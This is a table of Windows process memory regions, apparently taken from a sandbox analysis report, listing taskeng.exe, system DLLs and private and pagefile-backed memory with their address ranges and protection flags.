sortdefault.nls	0x010b0000	0x0137efff	Memory Mapped File	Readable	Region Actions
private_0x0000000001470000	0x01470000	0x014effff	Private Memory	Readable, Writable	Region Actions
kernel32.dll	0x77320000	0x7743efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77440000	0x77539fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77540000	0x776e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
taskeng.exe	0xffe30000	0xffea3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
tschannel.dll	0x7fef6130000	0x7fef6138fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
xmllite.dll	0x7fefb380000	0x7fefb3b4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ktmw32.dll	0x7fefb3c0000	0x7fefb3c9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x7fefca60000	0x7fefcaa6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x7fefceb0000	0x7fefcec6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wevtapi.dll	0x7fefcfb0000	0x7fefd01cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x7fefd350000	0x7fefd374fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x7fefd380000	0x7fefd38efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x7fefd470000	0x7fefd483fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd680000	0x7fefd6eafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7fefd860000	0x7fefd98cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x7fefd990000	0x7fefda28fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefda30000	0x7fefda5dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7fefdb00000	0x7fefdbdafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefdd60000	0x7fefddc6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefddd0000	0x7fefded8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefdee0000	0x7fefdfa8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefed40000	0x7fefeddefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x7fefede0000	0x7fefefe2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x7feff2b0000	0x7feff320fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7feff330000	0x7feff33dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7feff5b0000	0x7feff5cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x7feff5d0000	0x7feff6a6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feff860000	0x7feff860fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffd3000	0x7fffffd3000	0x7fffffd4fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd5000	0x7fffffd5000	0x7fffffd6fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd7000	0x7fffffd7000	0x7fffffd8fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd9000	0x7fffffd9000	0x7fffffdafff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffdb000	0x7fffffdb000	0x7fffffdcfff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions